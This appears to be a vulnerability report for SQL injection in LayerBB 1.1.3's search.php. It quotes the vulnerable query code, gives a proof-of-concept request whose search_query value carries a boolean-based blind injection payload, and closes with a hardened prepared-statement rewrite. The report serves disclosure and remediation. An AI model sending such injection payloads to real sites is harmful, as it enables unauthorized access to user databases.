LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.
Steps to Reproduce Issue
in search.php 86-91:

```php
if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) {
    $MYSQL->bind('search_query', $search_query);
    $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");
```
Unfiltered search_query results in SQL injection.

POC

Packet parameters:

```
search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=Search
```
Server Environment (PHP, MySQL, Apache Version and Operating System):
version 1.1.3
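For comparison, here is a hardened counterpart to the search above, written as an added example rather than LayerBB's own code. It assumes the `$MYSQL` wrapper's `bind()` ends up substituting the value into the SQL text (the page implies this but does not show the wrapper), and the `searchUsers()` / `escapeLikeTerm()` helpers are hypothetical names.

```php
<?php
// Added example (not LayerBB's code): the users search rewritten against PDO
// with a native server-side prepared statement. The LayerBB $MYSQL wrapper's
// bind()/query() internals are not on the page; the assumption here is that
// its "binding" is string substitution into the SQL, which is the only way
// the reported payload could reach MySQL as part of the query text.

declare(strict_types=1);

/**
 * Escape MySQL LIKE metacharacters so a user-supplied term matches literally.
 * Parameter binding stops SQL injection; this additionally stops "%" or "_"
 * in the term from widening the match (e.g. "%" returning every user).
 * MySQL's default LIKE escape character is the backslash.
 */
function escapeLikeTerm(string $term): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $term);
}

/**
 * Search users by a substring of the username.
 * $prefix is the table prefix (LayerBB uses a {prefix} token); it comes from
 * configuration, never from the request, and is validated before use.
 */
function searchUsers(PDO $pdo, string $prefix, string $searchQuery): array
{
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    // Native prepared statements: the placeholder value is sent to MySQL
    // separately from the SQL text, so quotes, RLIKE, CASE etc. in the term
    // are data only and cannot change the WHERE clause.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

    $sql = "SELECT * FROM {$prefix}users "
         . "WHERE username LIKE CONCAT('%', :search_query, '%')";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':search_query', escapeLikeTerm($searchQuery), PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage: with the reported payload the term is just a string that matches no
// username, instead of being evaluated as SQL.
// $pdo  = new PDO('mysql:host=localhost;dbname=layerbb', $dbUser, $dbPass);
// $rows = searchUsers($pdo, 'lb_', "admin' RLIKE (SELECT 1) AND 'GdPB'='GdPB");
```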